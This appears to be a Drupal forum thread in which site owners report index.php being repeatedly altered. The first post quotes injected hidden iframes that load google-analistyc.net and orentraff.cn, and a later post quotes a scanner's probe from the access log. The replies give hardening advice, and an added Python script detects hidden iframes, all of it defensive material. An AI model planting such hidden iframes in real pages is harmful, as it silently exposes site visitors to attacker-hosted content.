I'm running a web site with a Drupal 6.4 installation. All of my modules are up to date with the latest version. When I run cron, everything looks alright.
However, every 2-3 days my index gets overwritten by something. The following code is added to the bottom of my index.php:
<!-- ~ --><iframe src="http://google-analistyc.net/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ -->
and another time
<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe> <!-- ~ -->
Everything else in the index.php stays intact, only that line is added (which apparently causes my entire site to stop working.)
I am running the following modules:
Administration Menu 6.x-1.1
Content 6.x-2.0-rc7
Content Copy 6.x-2.0-rc7
Content Permissions 6.x-2.0-rc7
Fieldgroup 6.x-2.0-rc7
Node Reference 6.x-2.0-rc7
Number 6.x-2.0-rc7
Option Widgets 6.x-2.0-rc7
Text 6.x-2.0-rc7
User Reference 6.x-2.0-rc7
Aggregator 6.4
Blog 6.4
Blog API 6.4
Book 6.4
Color 6.4
Comment 6.4
Contact 6.4
Content translation 6.4
Database logging 6.4
Forum 6.4
Help 6.4
Locale 6.4
Menu 6.4
OpenID 6.4
Path 6.4
PHP filter 6.4
Ping 6.4
Poll 6.4
Profile 6.4
Search 6.3
Statistics 6.4
Syslog 6.4
Taxonomy 6.4
Throttle 6.4
Tracker 6.4
Trigger 6.4
Update status 6.4
Upload 6.4
Date 6.x-2.0-rc3
Date API 6.x-2.0-rc3
Date Copy 6.x-2.0-rc3
Date PHP4 6.x-2.0-rc3
Date Popup 6.x-2.0-rc3
Date Repeat API 6.x-2.0-rc3
Date Timezone 6.x-2.0-rc3
FCKeditor 6.x-1.3-rc1
IMCE 6.x-1.1
phpBBforum 6.x-1.03
Webform 6.x-2.1.3
Insert view 6.x-1.x-dev
Views 6.x-2.0-rc3
Views exporter 6.x-2.0-rc3
Views UI 6.x-2.0-rc3
[Edited to add <code> and </code> tags: nevets]
Comments
Nice :(
Try to simply change your password for FTP and SSH ... Hopefully it's gone then.
--patrick
http://rroarrr.com
The security breach could come from inside or from outside Drupal.
Besides changing your server account's passwords, and your user 1 password in Drupal, you could also chmod index.php to 444 to make it read-only.
Then you must search for the causes. Maybe your host's tech support can check the logs to find who is modifying your index.php and when, in case there is a greater security breach on the server.
On your side, you could check
- http://drupal.org/security to see if there is anything about your modules
- /admin/reports/updates to see whether all your modules are up to date
- /admin/settings/filters to make sure that you haven't allowed any untrusted users to use php or unfiltered html
- /admin/user/permissions for any too generous permissions to untrusted users.
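An added example, not part of the original posts: a small scanner that walks a web root and reports files containing a zero-sized or CSS-hidden iframe of the kind shown in the first post, together with each file's modification time. The sample strings and the hosts `bad.example` and `video.example` are constructed placeholders, and the list of file extensions is an assumption.

```python
import os
import re
import sys
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
HIDDEN_CSS_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
ZERO_RE = re.compile(r"^0+(px|%)?$", re.IGNORECASE)

# Constructed sample: same shape as the injected line in the post, placeholder host.
SAMPLE_INJECTED = ('<?php\nrequire_once "./includes/bootstrap.inc";\n'
                   '<!-- ~ --><iframe src="http://bad.example/in.cgi?3" width="0" '
                   'height="0" style="display:none"></iframe><!-- ~ -->\n')
# Constructed sample: an ordinary visible embed that must not be flagged.
SAMPLE_VISIBLE = '<iframe src="http://video.example/embed" width="640" height="360"></iframe>'


def hidden_iframes(text):
    """Return [(src_host, tag)] for iframes that are zero-sized or hidden by CSS."""
    hits = []
    for tag in IFRAME_RE.findall(text):
        attrs = {m[0].lower(): (m[1] or m[2] or m[3]) for m in ATTR_RE.findall(tag)}
        zero = any(ZERO_RE.match(attrs.get(k, "").strip()) for k in ("width", "height"))
        if zero or HIDDEN_CSS_RE.search(attrs.get("style", "")):
            hits.append((urlparse(attrs.get("src", "")).hostname or "", tag))
    return hits


def scan_tree(root, exts=(".php", ".inc", ".module", ".html", ".htm", ".js")):
    """Return {path: (mtime, [src_host, ...])} for files under root with hidden iframes."""
    findings = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = hidden_iframes(fh.read())
                if hits:
                    findings[path] = (os.path.getmtime(path), [h for h, _ in hits])
            except OSError:
                continue  # unreadable file: skip it, do not abort the scan
    return findings


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, (mtime, hosts) in sorted(scan_tree(root).items()):
        print(f"{path}\tmtime={mtime:.0f}\t{','.join(hosts)}")
```

The reported modification time gives a timestamp to look for in the FTP, SSH and web server logs. A clean result only means no hidden iframe is present now; it does not show how the file was written.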
Hacked 100%
The same, but other code was inserted.
In the Apache access.log, before the index was changed, I found
189.21.144.16 - - [27/Sep/2008:09:49:31 -0700] "GET /user/soapCaller.bs HTTP/1.1" 404 4789 "-" "Morfeus Fucking Scanner"
and then nothing suspicious
I am running the following modules:
Content 6.x-2.0-rc7
Content Templates 6.x-0.13
FileField 6.x-3.0-alpha4
ImageField 6.x-3.0-alpha2
Text 6.x-2.0-rc7
Friend 6.x-1.x-dev
Archive 6.x-1.2
Aggregator 6.4
Blog 6.4
Comment 6.4
Contact 6.4
Database logging 6.4
Locale 6.4
Menu 6.4
Path 6.4
PHP filter 6.4
Poll 6.4
Profile 6.4
Search 6.4
Statistics 6.4
Syslog 6.4
Taxonomy 6.4
Nodequeue generate 6.x-2.x-dev
ImageAPI 6.x-1.0-alpha2
ImageAPI GD2 6.x-1.0-alpha2
Nodequeue 6.x-2.x-dev
Blog AddOns 6.x-1.1
Printer-friendly pages (core) 6.x-1.0-rc3
CAPTCHA 6.x-1.0-rc2
Image CAPTCHA 6.x-1.0-rc2
Tagadelic 6.x-1.0
NodeCarousel 6.x-1.x-dev
Views 6.x-2.0-rc3
Views UI 6.x-2.0-rc3
Fivestar 6.x-1.12
Voting API 6.x-2.0-beta3
BUEditor 6.x-1.2
Custom Error 6.x-1.x-dev
Favorite Nodes 6.x-1.x-dev
Forward 6.x-1.x-dev
Google CSE 6.x-1.2
Google CSE search 6.x-1.2
IMCE 6.x-1.1
Meta tags 6.x-1.0-rc1
Multiping 6.x-1.x-dev
Pathauto 6.x-1.0
Quick Tabs 6.x-1.x-dev
Token 6.x-1.10